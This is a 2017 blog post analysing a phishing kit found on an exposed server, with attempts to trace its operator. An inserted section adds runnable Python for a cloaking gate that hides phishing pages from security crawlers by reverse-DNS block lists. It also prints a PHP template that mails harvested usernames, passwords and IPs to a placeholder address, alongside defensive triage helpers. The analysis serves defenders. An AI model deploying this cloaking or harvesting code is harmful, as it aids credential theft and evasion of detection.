Uncovering an Iranian Phishing Attack.

Omaid Faizyar
3 min read · Jan 22, 2017

There has been a wave of phishing attacks hitting Silicon Valley lately, and these attacks have been very effective at spreading from one compromised mailbox to the next and compromising whole companies. Being familiar with this sort of thing, I decided to take a closer look.

Fortunately, it appears that the people behind these attacks don’t understand how chmod works: their web server let me traverse through their directories, and I was able to quickly grab their source code, which they had conveniently left packed in a .zip file for me. Very polite and hospitable of them!

A quick look at the source code showed me the email address that all captured information was being sent to. The kit captures credentials, IP addresses, phone numbers and recovery emails. Blackhats capture the victim’s IP address so they can later log in through a proxy in the same region as the victim; a login from a geographically consistent address is much less likely to trip the mail provider’s anomalous-login checks and raise red flags.

A quick search on HackForums to see who ‘NoBODY’ is leads to a dead end. For people who don’t understand basic OPSEC and file permissions, they seem surprisingly self-aware and experienced in phishing. In the source code they block IP addresses whose hostnames are affiliated with threat-intelligence companies such as Cyveillance and PhishTank, so that crawlers from those companies never see the phishing page. It is possible that the attacker is not the author of this source code, and is just a script kiddie who bought the kit from NoBODY. This sort of black-market entrepreneurship is nothing new, as we have seen with ransomware moving towards a software-as-a-service model. Okay, now let’s look up the generic email address…
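As an added example (not the kit’s code, which this post does not reproduce), here is a Python sketch of the two pieces described above: the reverse-DNS gate that hides the phishing page from threat-intelligence crawlers, and a triage helper that pulls the exfiltration address out of a recovered kit. The blocklist substrings, the blocked network, the reverse-DNS table and the PHP snippet are all constructed for illustration; a real kit would call gethostbyaddr() on $_SERVER['REMOTE_ADDR'] instead of consulting a table.

```python
"""Sketch of a phishing kit's visitor gate plus a triage helper for a recovered kit.

Added example: none of this is the kit described in the post. Reverse DNS is
replaced by a constructed lookup table so the example runs offline.
"""
import ipaddress
import re

# Constructed blocklist in the spirit of the kit described in the post. Hostname
# substrings and the network range are assumptions for illustration only.
BLOCKED_HOSTNAME_PATTERNS = [
    r"cyveillance", r"phishtank", r"netcraft", r"crawl", r"scanner", r"security",
]
BLOCKED_NETWORKS = [ipaddress.ip_network("192.0.2.128/25")]  # TEST-NET-1, constructed

# Constructed reverse-DNS table standing in for socket.gethostbyaddr(). None means no PTR.
FAKE_RDNS = {
    "203.0.113.7": "crawler-07.cyveillance.example",
    "203.0.113.9": "scan.phishtank.example",
    "198.51.100.23": "c-198-51-100-23.hsd1.ca.comcast.example",
    "192.0.2.5": None,
    "192.0.2.200": None,
}


def reverse_lookup(ip, table=FAKE_RDNS):
    """Return the PTR hostname for ip, or None when there is none."""
    return table.get(ip)


def is_blocked(ip, table=FAKE_RDNS):
    """True when the visitor looks like a security crawler: either its address sits
    in a blocked range, or its reverse-DNS hostname matches a blocked substring."""
    addr = ipaddress.ip_address(ip)
    if any(addr in net for net in BLOCKED_NETWORKS):
        return True
    host = (reverse_lookup(ip, table) or "").lower()
    return any(re.search(pattern, host) for pattern in BLOCKED_HOSTNAME_PATTERNS)


def gate(ip, table=FAKE_RDNS):
    """What the kit would serve this visitor: the phishing page, or a harmless redirect."""
    return "redirect" if is_blocked(ip, table) else "phish"


# Constructed PHP fragment imitating the shape of a credential-harvesting kit.
KIT_SNIPPET = r"""<?php
$to = "nobody.collector@example.com";
$ip = $_SERVER['REMOTE_ADDR'];
$host = gethostbyaddr($ip);
$message = "User: " . $_POST['email'] . " Pass: " . $_POST['password'] . " IP: " . $ip;
mail($to, "New Login | " . $ip, $message);
"""

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")


def find_exfil_emails(source):
    """Sorted, de-duplicated e-mail addresses found in a kit's source (where the loot goes)."""
    return sorted(set(EMAIL_RE.findall(source)))


def has_rdns_gate(source):
    """True when the kit resolves the visitor's address, a tell for hostname-based gating."""
    return "gethostbyaddr(" in source


if __name__ == "__main__":
    for ip in FAKE_RDNS:
        print(ip, "->", gate(ip))
    print("exfil targets:", find_exfil_emails(KIT_SNIPPET))
    print("rDNS gate present:", has_rdns_gate(KIT_SNIPPET))
```

The practical consequence for defenders is the one the post hints at: if you fetch a suspected phishing URL from an address whose PTR record names your employer or a known scanner, the kit serves you the redirect and your verdict is "benign". Fetch it from an address that looks residential, or treat a page that behaves differently per source address as suspicious in itself.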

The poor chap registered a domain name (which is now defunct)! Poor guy, didn’t you learn OPSEC from the Grugq? The registered address is fake, but this guy seems to be Iranian. Is this a state-sponsored attack backed by Iran? Most likely not, but my clickbait title did its job and you’re almost at the end of the article anyway!

Using a phone lookup tool created by an old friend leads me to a previous owner of the phone number, who turns out to be just some economist in North Carolina, not the man I’m looking for.

Welp, nothing I can do from here, it’s probably just a Google Voice number anyways. I guess we’ll all have to wait for Brian Krebs to unveil them in a few months. Until next time!


Omaid Faizyar

I hack into companies for a living and dabble in Bitcoin. Sometimes get quoted on Russia Today.